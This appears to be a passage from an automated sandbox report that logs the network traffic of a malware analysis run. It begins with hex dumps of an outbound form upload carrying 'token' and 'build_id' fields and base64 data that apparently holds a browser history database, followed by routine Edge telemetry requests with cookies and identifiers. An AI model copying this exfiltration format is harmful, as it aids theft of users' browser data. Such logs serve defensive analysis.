                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 35 70 7a 6d 6f 70 7a 63 6a 65 63 74 72 69 35 66 75 61 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------5pzmopzcjectri5fua16Content-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------5pzmopzcjectri5fua16Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------5pzmopzcjectri5fua16Cont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                            Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:27 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            26192.168.2.55007818.238.49.524435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC925OUTGET /b?rn=1735660764408&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A5E9301422D68911D9D866743856932&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:26 GMT
                                                                                                                                                                                                                                                                                            Location: /b2?rn=1735660764408&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A5E9301422D68911D9D866743856932&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                            set-cookie: UID=1947198f5f82c4b68f0d5cb1735660766; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                            set-cookie: XID=1947198f5f82c4b68f0d5cb1735660766; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                            Via: 1.1 a363b826ba48f4e79f7e95839a3bcf3a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                            X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                            X-Amz-Cf-Id: vNb-j_BHLW6KJWNaebrvnl7qk3IikxAZFFnM03yJI-N3ZeNm3kOcAA==


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            27192.168.2.55007620.110.205.1194435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC1175OUTGET /c.gif?rnd=1735660764407&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=026bcac3993949958ca71788bb1e040f&activityId=026bcac3993949958ca71788bb1e040f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: c.msn.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: _C_ETH=1; USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                            Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                            Location: https://c.bing.com/c.gif?rnd=1735660764407&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=026bcac3993949958ca71788bb1e040f&activityId=026bcac3993949958ca71788bb1e040f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B3DB3A06CBDF43B98D4B58889567A90D&RedC=c.msn.com&MXFR=2A5E9301422D68911D9D866743856932
                                                                                                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                            P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                            Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                            Set-Cookie: MUID=2A5E9301422D68911D9D866743856932; domain=.msn.com; expires=Sun, 25-Jan-2026 15:59:26 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:26 GMT
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            28192.168.2.55008118.238.49.524435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC1012OUTGET /b2?rn=1735660764408&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A5E9301422D68911D9D866743856932&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: UID=1947198f5f82c4b68f0d5cb1735660766; XID=1947198f5f82c4b68f0d5cb1735660766
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:27 GMT
                                                                                                                                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                            Via: 1.1 a410463cf33c032bf74ee26bf94b81b2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                            X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                            X-Amz-Cf-Id: -DtI1wfMJXnMWrPfdJDahmlrl9UArYbq34n4oixJCqXCVU0tkKVynA==


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            29192.168.2.550077104.46.162.2254435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735660764406&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 3869
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
